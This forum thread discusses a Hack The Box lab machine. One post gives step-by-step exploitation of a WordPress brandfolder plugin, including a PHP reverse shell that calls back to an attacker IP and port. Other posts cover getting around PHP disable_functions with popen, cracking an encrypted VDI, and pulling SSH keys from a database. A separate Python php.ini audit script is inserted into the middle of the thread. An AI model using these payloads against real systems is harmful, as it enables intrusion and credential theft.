Moderators-HTB [Discussion]
Can anyone explain why we can have a system shell with weevely3 even though disable_functions contains system,exec,shell_exec?
Reply
(August 7, 2022, 03:02 PM)farkow Wrote:
(August 7, 2022, 02:35 PM)Exa Wrote:
(August 7, 2022, 02:21 PM)fukingfuck Wrote: for user part.
1. Go to the www-data home dir = /var/www/html/logs/uploads/; this folder is writable for www-data
2. Then create a new folder, e.g. "mkdir wp"
3. Now go to /var/www/html/logs/uploads/wp and create a reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4. Also create the directory wp-admin/includes
5. Now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create the files media.php, file.php, image.php, post.php with the following content: <?php echo '123'; ?>
6. In your browser/proxy, request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"

If you want to know what's going on, read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591


Thanks @farkow and @fukingfuck, finally got the user flag.
For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though.


Anytime! I used /dev/shm.
Stuck on root part at the moment actually. Trying to figure out how to open an encrypted vdi file. Somehow, the box and the key itself is not applied in vm and it is not mounted.

// on the other processor, brute forcing :P


https://github.com/hashcat/hashcat/blob/master/tools/virtualbox2hashcat.py and https://www.virtualbox.org/wiki/Downloads#VirtualBox6.1.36OracleVMVirtualBoxExtensionPack 

After, keep the brute going.
Reply
(August 7, 2022, 03:26 PM)Exa Wrote: Can anyone explain why we can have a system shell with weevely3 even though disable_functions contains system,exec,shell_exec?


popen. https://github.com/epinna/weevely3/blob/master/modules/shell/sh.py#L31
Reply
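An added example, not part of any post in this thread: a small audit that reads a php.ini `disable_functions` value and lists the process-spawning PHP built-ins it leaves callable, which is why a list holding only system, exec and shell_exec still allows popen and proc_open. The spawner list is a well-known but non-exhaustive set, the ini texts are constructed samples, and the function names `parse_disable_functions` and `remaining_spawners` are hypothetical.

```python
import re

# PHP built-ins that start an OS process (well-known set, not exhaustive).
PROCESS_SPAWNERS = ("system", "exec", "shell_exec", "passthru",
                    "popen", "proc_open", "pcntl_exec")

_DIRECTIVE = re.compile(r"^\s*disable_functions\s*=\s*(.*)$", re.IGNORECASE)

# Constructed sample mirroring the list quoted in the thread.
SAMPLE_INI = """\
; constructed sample
[PHP]
disable_functions = system,exec,shell_exec
"""

# Constructed sample with every spawner in PROCESS_SPAWNERS disabled.
HARDENED_INI = """\
[PHP]
disable_functions = "system, exec, shell_exec, passthru, popen, proc_open, pcntl_exec"
"""


def parse_disable_functions(ini_text):
    """Return the lower-cased set of function names disabled in php.ini text."""
    value = ""
    for line in ini_text.splitlines():
        if line.lstrip().startswith(";"):      # whole-line comment
            continue
        match = _DIRECTIVE.match(line)
        if match:
            value = match.group(1)             # assumption: last assignment wins
    value = value.split(";", 1)[0].strip().strip("\"'")  # drop trailing comment, quotes
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def remaining_spawners(ini_text):
    """List process-spawning functions the configuration does not disable."""
    disabled = parse_disable_functions(ini_text)
    return [name for name in PROCESS_SPAWNERS if name not in disabled]


if __name__ == "__main__":
    for label, ini in (("thread list", SAMPLE_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: still callable -> {remaining_spawners(ini)}")
```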
(August 7, 2022, 03:39 PM)Hacker2222 Wrote: where is the virtualbox vdi at?


You have to be jack first, and you will see for sure
Reply
I'm getting a segmentation fault with chisel ><
Reply
found
|       5 | SSH key       | [email protected] | <SSHKEY>

in sql db
Reply
How do I correctly mount the vdi file? I keep getting a UUID error.
Reply
I can't decrypt the ciphertext :s, is the "SELECT * FROM wp_options where option_name LIKE 'pms_encrypt_key'" secret key?
Reply
(August 7, 2022, 04:16 PM)vexxxi Wrote: found
|       5 | SSH key       | [email protected] | <SSHKEY>

in sql db


Where did u find it? In what table?
Reply
(August 7, 2022, 06:27 PM)m4rsh3ll Wrote:
(August 7, 2022, 04:16 PM)vexxxi Wrote: found
|       5 | SSH key       | [email protected] | <SSHKEY>

in sql db


Where did u find it? In what table?

It's in wp_pms_passwords;
you can edit the entry for admin though and log in to the site
Reply

